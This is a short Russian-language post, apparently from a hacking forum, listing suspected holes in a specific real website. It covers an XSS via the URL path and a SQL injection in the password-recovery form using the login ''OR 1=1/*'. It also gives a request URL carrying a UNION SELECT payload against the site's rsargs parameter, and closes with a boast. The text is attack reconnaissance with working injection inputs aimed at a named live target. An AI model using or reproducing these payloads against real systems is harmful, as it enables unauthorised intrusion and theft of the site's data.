При выключеном экранировании (непомню как точно это называется) возможна XSS
_http://expert.rv.ua/index.php/xsshere
в js такая штука
uri = "/index.php/xsshere";
===============
Подозрение на SQL Inj
Жмакаем "Забули пароль?"
Пишем логин "loleg" мыло "loleg@mail.ru"
Отвечает "Невірний логін!"

Пишем логин 'OR 1=1/* мыло "loleg@mail.ru"
Отвечает "E-mail не відповідає E-mail введеному при регістрації!" тоесть пропускает запрос
===============
Вывода нет (а может и есть лень копать)
_http://expert.rv.ua/?rs=cpc&rst=&rsrnd=1201&rsargs[]=-2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,12/*&rsargs[]=18&rsargs[]=4&rsargs[]=0

<offtop>Бойтесь мну </offtop>